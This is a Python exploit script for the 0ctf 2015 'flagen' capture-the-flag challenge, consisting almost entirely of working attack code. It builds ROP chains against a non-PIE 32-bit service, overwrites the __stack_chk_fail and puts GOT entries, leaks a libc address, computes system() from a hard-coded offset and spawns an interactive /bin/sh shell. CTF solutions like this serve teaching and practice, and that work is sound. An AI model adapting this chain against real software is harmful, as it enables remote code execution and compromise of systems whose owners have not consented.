0ctf 2015 flagen pwn script
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
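def sock(remoteip, remoteport):
    """Open a TCP connection to ``(remoteip, remoteport)``.

    Returns the raw socket and an unbuffered read/write file object
    wrapping it (Python 2 ``makefile`` signature). If the connect attempt
    fails, the socket is closed before the error propagates, so a failed
    call no longer leaks a file descriptor.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((remoteip, remoteport))
    except socket.error:
        s.close()
        raise
    # bufsize=0: nothing is held back in a user-space buffer, every write
    # reaches the socket immediately.
    f = s.makefile('rw', bufsize=0)
    return s, f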
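def read_until(f, delim='\n'):
    """Read ``f`` one character at a time until ``delim`` has been seen.

    Returns everything read, including the delimiter. Raises ``EOFError``
    if the stream ends first: ``read(1)`` returns an empty string at EOF,
    so the original loop would spin forever on a closed connection.
    """
    data = ''
    while not data.endswith(delim):
        chunk = f.read(1)
        if not chunk:
            raise EOFError('stream closed before %r was seen' % (delim,))
        data += chunk
    return data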
def p(a):
    """Pack the integer ``a`` as a 4-byte little-endian unsigned value."""
    little_endian_u32 = struct.Struct("<I")
    return little_endian_u32.pack(a)
def u(a):
    """Decode 4 little-endian bytes into an unsigned int (inverse of ``p``)."""
    little_endian_u32 = struct.Struct("<I")
    (value,) = little_endian_u32.unpack(a)
    return value
def shell(s):
    """Hand the connected socket ``s`` over to an interactive terminal loop.

    Attaches the already-connected socket to a fresh Telnet object and runs
    its ``interact`` loop. NOTE: telnetlib is deprecated and was removed in
    Python 3.13.
    """
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()
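# Target endpoint is hard-coded: the challenge service is expected locally.
s, f = sock('localhost', 4444)

# Every address below is absolute (0x0804xxxx), i.e. the binary is assumed to
# be loaded without PIE; all of them are specific to this challenge build and
# to the libc the service was running against.
ret = 0x804846a
popret = 0x8048481
# 0x08048d8f: pop ebp ; ret ; (1 found)
pop_ebp_ret = 0x08048d8f
# 0x08048d8e: pop edi ; pop ebp ; ret ; (1 found)
pop2ret = 0x08048d8e
pop3ret = 0x8048d8d
leaveret = 0x80485d8
addesp_300 = 0x8048afa
puts_got = 0x804b010
puts_plt = 0x8048510
read_plt = 0x80484a0
# presumably puts - system in the remote libc; only valid for that libc build
puts_system_offset = 0x254c0
read_buf_size_func = 0x80486CB
# __stack_chk_fail@plt = 0x80484e0
# 0x80484e0 <__stack_chk_fail@plt>: jmp DWORD PTR ds:0x804b01c
stack_chk_fail_GOT = 0x804b01c
data_addr = 0x0804b620

# Stage 1: menu option 1, then the first chain. The author's comment below
# indicates the __stack_chk_fail GOT entry is writable here (no full RELRO),
# which is why the stack-protector failure path can be redirected instead of
# aborting the process.
f.write('1\n')
payload = ''
payload += p(addesp_300) # overwrite by this
payload += 'b'*9
payload += 'h'*85
payload += p(pop2ret)
payload += 'b'*4
payload += p(stack_chk_fail_GOT) # stack_chk_fail's got is overwritten and execute in 0x80488bf
payload += p(read_buf_size_func)
payload += p(pop_ebp_ret)
payload += p(data_addr)
payload += p(leaveret)
f.write(payload + '\n')
read_until(f, 'Done.\n')

# Stage 2: menu option 4, then the second chain (leak puts@GOT, read 12 bytes
# back into puts@GOT, call puts again with puts_got+4 as its argument).
f.write('4\n')
payload2 = ''
payload2 += p(0xdeadbeaf)
payload2 += p(puts_plt)
payload2 += p(popret)
payload2 += p(puts_got) # got leak
payload2 += p(read_plt)
payload2 += p(pop3ret)
payload2 += p(0)
payload2 += p(puts_got) # got overwirte and send /bin/sh\0
payload2 += p(12)
payload2 += p(puts_plt) # puts's got is overwritten by system
payload2 += p(0xdeadbeaf)
payload2 += p(puts_got+4) # /bin/sh\0
f.write(payload2 + '\n')
read_until(f, 'Your choice: ')

# The leaked 4 bytes are the resolved puts address; system is derived from it.
puts_addr = u(f.read(4))
system_addr = puts_addr - puts_system_offset
print('[*] puts addr: {}'.format(hex(puts_addr)))
# Fix: the original printed puts_addr on both lines, so the computed system
# address was never actually shown.
print('[*] system addr: {}'.format(hex(system_addr)))
# 4 bytes + '/bin/sh\0' (8 bytes) = the 12 bytes requested by p(12) above.
f.write(p(system_addr) + '/bin/sh\0')
shell(s)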